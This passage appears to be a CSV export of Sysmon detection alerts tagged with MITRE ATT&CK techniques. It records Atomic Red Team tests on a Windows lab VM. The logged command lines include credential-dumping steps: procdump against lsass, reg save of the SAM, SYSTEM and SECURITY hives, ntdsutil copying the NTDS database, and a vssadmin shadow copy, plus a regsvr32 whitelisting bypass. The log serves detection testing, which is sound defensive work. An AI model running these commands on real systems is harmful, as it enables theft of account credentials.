<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548027.239318,2019-07-19T18:53:47.239318+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\regsvr32.exe ) through command line ( /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:47.083068Z"">
</TimeCreated>
<EventRecordID>4047</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:47.056</Data>
<Data Name=""ProcessGuid"">747F3D96-D97B-5D31-0000-00109DEB3800</Data>
<Data Name=""ProcessId"">5788</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\regsvr32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine""> /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D97A-5D31-0000-001019DE3800</Data>
<Data Name=""ParentProcessId"">5828</Data>
<Data Name=""ParentImage"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549086.989143,2019-07-19T19:11:26.989143+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;vssadmin.exe create shadow /for=C:&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:26.971596Z"">
</TimeCreated>
<EventRecordID>4128</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:26.958</Data>
<Data Name=""ProcessGuid"">747F3D96-DD9E-5D31-0000-00100C3F4B00</Data>
<Data Name=""ProcessId"">5036</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;vssadmin.exe create shadow /for=C:&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549086.971596,2019-07-19T19:11:26.971596+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:26.884595Z"">
</TimeCreated>
<EventRecordID>4127</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:26.875</Data>
<Data Name=""ProcessGuid"">747F3D96-DD9E-5D31-0000-00106D3A4B00</Data>
<Data Name=""ProcessId"">4208</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549086.884595,2019-07-19T19:11:26.884595+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:26.852817Z"">
</TimeCreated>
<EventRecordID>4126</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:26.845</Data>
<Data Name=""ProcessGuid"">747F3D96-DD9E-5D31-0000-001059374B00</Data>
<Data Name=""ProcessId"">584</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549086.852817,2019-07-19T19:11:26.852817+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:26.686585Z"">
</TimeCreated>
<EventRecordID>4125</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:26.673</Data>
<Data Name=""ProcessGuid"">747F3D96-DD9E-5D31-0000-00109A2F4B00</Data>
<Data Name=""ProcessId"">264</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1563549086.686585,2019-07-19T19:11:26.686585+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp&quot; ) contain suspicious command ( procdump.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:26.642464Z"">
</TimeCreated>
<EventRecordID>4124</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:26.626</Data>
<Data Name=""ProcessGuid"">747F3D96-DD9E-5D31-0000-00106E2C4B00</Data>
<Data Name=""ProcessId"">5488</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549086.686585,2019-07-19T19:11:26.686585+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:26.642464Z"">
</TimeCreated>
<EventRecordID>4124</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:26.626</Data>
<Data Name=""ProcessGuid"">747F3D96-DD9E-5D31-0000-00106E2C4B00</Data>
<Data Name=""ProcessId"">5488</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549086.642464,2019-07-19T19:11:26.642464+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:26.549874Z"">
</TimeCreated>
<EventRecordID>4123</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:26.535</Data>
<Data Name=""ProcessGuid"">747F3D96-DD9E-5D31-0000-0010CB274B00</Data>
<Data Name=""ProcessId"">3016</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549083.336763,2019-07-19T19:11:23.336763+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\security security&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:23.317303Z"">
</TimeCreated>
<EventRecordID>4121</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:23.302</Data>
<Data Name=""ProcessGuid"">747F3D96-DD9B-5D31-0000-00106C1C4B00</Data>
<Data Name=""ProcessId"">7164</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\security security&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549081.105496,2019-07-19T19:11:21.105496+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\system system&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:21.090401Z"">
</TimeCreated>
<EventRecordID>4119</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:21.069</Data>
<Data Name=""ProcessGuid"">747F3D96-DD99-5D31-0000-001069A34A00</Data>
<Data Name=""ProcessId"">4080</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\system system&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549077.243643,2019-07-19T19:11:17.243643+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\sam sam&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:17.224751Z"">
</TimeCreated>
<EventRecordID>4117</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:17.211</Data>
<Data Name=""ProcessGuid"">747F3D96-DD95-5D31-0000-001075964A00</Data>
<Data Name=""ProcessId"">7140</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
